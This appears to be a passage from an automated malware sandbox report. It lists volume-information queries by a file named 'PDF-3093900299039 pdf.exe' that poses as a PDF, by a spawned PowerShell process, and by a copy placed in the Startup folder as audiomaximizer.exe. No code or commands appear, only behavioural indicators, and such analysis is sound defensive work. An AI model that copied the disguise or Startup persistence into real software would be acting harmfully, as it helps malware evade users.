            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Users\user\Desktop\PDF-3093900299039 pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
